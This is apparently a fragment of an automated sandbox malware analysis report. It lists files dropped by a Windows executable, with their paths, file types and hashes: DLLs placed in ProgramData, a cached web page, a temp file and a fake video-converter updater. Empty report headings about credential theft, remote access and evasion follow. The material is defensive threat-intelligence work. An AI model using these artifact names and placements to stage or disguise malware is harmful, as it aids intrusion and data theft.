C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199786602107[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3035), with CRLF, LF line terminators	A005E9FFB7FA2D681B5D816F37C0BBD0	A2153E5EDE885CE50667328E0342D5853FCE4BCB	93B002E291C4732BA5B57C44AE7B4552DB28744B9D873305D1A35900001C08B9
C:\Users\user\AppData\Local\Temp\delays.tmp	Non-ISO extended-ASCII text, with very long lines (65536), with no line terminators	F5D8DBBB5379A360AE6018BCBBD02561	0FDFAB151F769C2BA6E96E5D6C96EC92FE74EC49	FE0B9992F19270E0BE4F71BF6F8C919D18942176003F626EA8CE32C46D433540
C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe	PE32 executable (GUI) Intel 80386, for MS Windows	5F3AA21F651A11DA515CF7CA559779DE	38C2F8ED6E9AEC63A3F8D1A46ED8880F40373ECD	F4BAB09FD17EC12C54C539D992B2EAE31F3607046806E9891E3622B9844EFC1C

Windows Analysis Report 7ZthFNAqYp.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
7ZthFNAqYp.exe

Malware Threat Intel
Provided by